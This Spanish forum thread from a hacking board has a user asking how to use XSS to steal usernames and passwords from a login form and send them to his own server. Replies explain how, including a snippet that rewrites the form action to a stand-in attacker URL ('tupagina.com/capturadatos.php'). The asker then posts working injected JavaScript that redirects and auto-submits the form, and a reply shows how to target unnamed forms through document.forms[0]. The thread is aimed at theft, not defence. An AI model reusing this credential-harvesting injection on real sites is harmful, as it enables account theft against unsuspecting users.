elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Ético (Moderador: toxeek)
| | |-+  ¿Como se puede robar post o get desde javascript?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: ¿Como se puede robar post o get desde javascript?  (Leído 2,382 veces)
Varlch

Desconectado Desconectado

Mensajes: 100



Ver Perfil WWW
¿Como se puede robar post o get desde javascript?
« en: 21 Noviembre 2014, 14:26 »

¿Como se puede obtener post o get de un form desde un javascript y enviar estos a mi servidor?

Pongamos que hago una inyección XSS en una web donde esta el form de login, ¿se podría hacer que envíe el user y pass a mi servidor, o simplemente no se puede?
En línea

T. Collins

Desconectado Desconectado

Mensajes: 206


Ver Perfil
Re: ¿Como se puede robar post o get desde javascript?
« Respuesta #1 en: 21 Noviembre 2014, 14:32 »

Si como dices, puedes ejecutar javascript, claro que se puede. Por ejemplo, la forma más simple y cantosa es cambiar el action del form.
« Última modificación: 21 Noviembre 2014, 14:42 por T. Collins » En línea

Varlch

Desconectado Desconectado

Mensajes: 100



Ver Perfil WWW
Re: ¿Como se puede robar post o get desde javascript?
« Respuesta #2 en: 21 Noviembre 2014, 14:59 »

¿Un pequeño ejemplo?
En línea

engel lex
CoAdmin
***
Desconectado Desconectado

Mensajes: 15.347



Ver Perfil
Re: ¿Como se puede robar post o get desde javascript?
« Respuesta #3 en: 21 Noviembre 2014, 15:05 »

es simplemente cambiar el action del form :P

es decir
si el form originalmente es
Código
  1. <form method="POST" action="/paginadatos.php">
haces un jscript que lo cambie a
Código
  1. <form method="POST" action="http://tupagina.com/capturadatos.php">

si tienes dudas sobre como hacerlo recomiendo leer un tutorial sobre jscript completo que toque manipulación del DOM :P
En línea

El problema con la sociedad actualmente radica en que todos creen que tienen el derecho de tener una opinión, y que esa opinión sea validada por todos, cuando lo correcto es que todos tengan derecho a una opinión, siempre y cuando esa opinión pueda ser ignorada, cuestionada, e incluso ser sujeta a burla, particularmente cuando no tiene sentido alguno.
Varlch

Desconectado Desconectado

Mensajes: 100



Ver Perfil WWW
Re: ¿Como se puede robar post o get desde javascript?
« Respuesta #4 en: 21 Noviembre 2014, 17:16 »

He conseguido hacerlo
Código:
<form action="" method="post" name="nombre_form">
<input type="text" name="Username" placeholder="Usuario"/><br />
<input type="password" name="Password" placeholder="Contraseña" /><br />
<input type="submit" value="Enviar" />
//código supuestamente inyectado
<script>
document.nombre_form.action = 'obtener_datos.php';
document.nombre_form.submit();
</script>

luego solo hace falta un obtener_datos.php que recoja las variables y las envié otra vez al servidor inicial pero que pasa si el form no tiene la variable name.
En línea

T. Collins

Desconectado Desconectado

Mensajes: 206


Ver Perfil
Re: ¿Como se puede robar post o get desde javascript?
« Respuesta #5 en: 21 Noviembre 2014, 17:48 »

Puedes acceder al form de distintas formas, como has puesto tú, con document.getElementById si tiene un id, con document.forms[] ....
En línea

Varlch

Desconectado Desconectado

Mensajes: 100



Ver Perfil WWW
Re: ¿Como se puede robar post o get desde javascript?
« Respuesta #6 en: 21 Noviembre 2014, 17:52 »

Pongamos que tienes exactamente este form:
Código:
<form action="" method="post">
<input type="text" name="Username" placeholder="Usuario"/><br />
<input type="password" name="Password" placeholder="Contraseña" /><br />
<input type="submit" value="Enviar" />
//código a inyectar

como robarías las supuestas credenciales en este mismo form.
En línea

T. Collins

Desconectado Desconectado

Mensajes: 206


Ver Perfil
Re: ¿Como se puede robar post o get desde javascript?
« Respuesta #7 en: 21 Noviembre 2014, 17:58 »

Si es el único o primer form de la página, document.forms[0]. En el navegador tienes una consola de javascript y puedes ir probando, además hay mucha información en internet sobre como hacer esto.
En línea

Varlch

Desconectado Desconectado

Mensajes: 100



Ver Perfil WWW
Re: ¿Como se puede robar post o get desde javascript?
« Respuesta #8 en: 21 Noviembre 2014, 18:01 »

Pues ya esta todo resuelto, gracias.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines